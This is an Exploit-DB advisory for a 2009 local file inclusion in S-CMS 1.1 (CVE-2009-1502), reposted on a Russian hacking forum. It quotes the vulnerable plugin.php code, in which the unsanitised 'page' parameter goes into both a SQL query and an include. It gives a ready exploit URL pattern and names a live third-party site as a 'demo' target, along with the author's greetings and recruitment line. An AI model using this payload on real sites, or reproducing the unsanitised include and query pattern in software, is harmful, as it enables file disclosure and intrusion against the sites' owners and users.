Exploit S-CMS 1.1 Stable - 'page' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8566
Проверка EDB
  1. Пройдено
Автор
ZORLU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1502
Дата публикации
2009-04-29
Код:
[~] S-Cms 1.1 Stable (page) LFi
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: [email protected]
[~] 
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

file:

s-cms/plugin.php

code:

$page=$_GET['page'];        ( error 1 )


$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");

if ($sql_select_plugin_case){

include "plugins/$page";    (error 2 )

exp:

yildirimordulari.com/s-cms/plugin.php?page=[File]

for demo:

http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-04-29]
 
Источник
www.exploit-db.com

Похожие темы